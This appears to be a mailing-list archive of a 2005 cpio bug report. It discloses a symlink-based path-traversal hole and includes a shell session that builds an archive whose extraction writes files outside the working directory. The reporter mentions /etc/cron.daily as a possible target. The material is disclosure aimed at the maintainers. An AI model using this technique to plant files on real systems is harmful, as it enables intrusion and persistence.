[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Bug-cpio] Fwd: Bug#306693: cpio: allows extracting insecure pathnames (
|
From: |
t takahashi |
|
Subject: |
[Bug-cpio] Fwd: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..) |
|
Date: |
Fri, 6 May 2005 17:52:29 -0700 |
Part 2.
---------- Forwarded message ----------
From: t takahashi <address@hidden>
Date: Apr 27, 2005 7:54 PM
Subject: Re: Bug#306693: cpio: allows extracting insecure pathnames
(leading slash = / and dotdot = ..)
To: address@hidden, address@hidden
Cc: address@hidden
P.P.S. I found a more subtle security hole. It is even more dangerous.
/tmp/aaa$ mkdir ../b
/tmp/aaa$ ln -s ../b b
/tmp/aaa$ touch ../b/trojan
/tmp/aaa$ ls b
trojan
/tmp/aaa$ find b b/trojan
b
b/trojan
/tmp/aaa$ find b b/trojan | cpio -o > dangerous
cpio: b: truncating inode number
cpio: b/trojan: truncating inode number
1 block
/tmp/aaa$ /bin/rm -v b/trojan b
removed `b/trojan'
removed `b'
/tmp/aaa$ ls
dangerous
/tmp/aaa$ cpio -t<dangerous
b
b/trojan
1 block
/tmp/aaa$ cpio -vt<dangerous
lrwxrwxrwx 1 kpc kpc 4 Apr 27 19:46 b -> ../b
-rw------- 1 kpc kpc 0 Apr 27 19:46 b/trojan
1 block
Notice that grep '\.\.' on the output of cpio -t would not find the
relative pathname. You have to use cpio -vt. Now watch this:
/tmp/aaa$ cpio -i<dangerous
1 block
/tmp/aaa$ ls
b dangerous
/tmp/aaa$ ls ../b
trojan
IMHO cpio should disallow this by default. Imagine
../../../../../../../etc/cron.daily again. cpio should check for
extracting in directories that are not below pwd, even if it is via
indirect means such as a symlink.
Wow!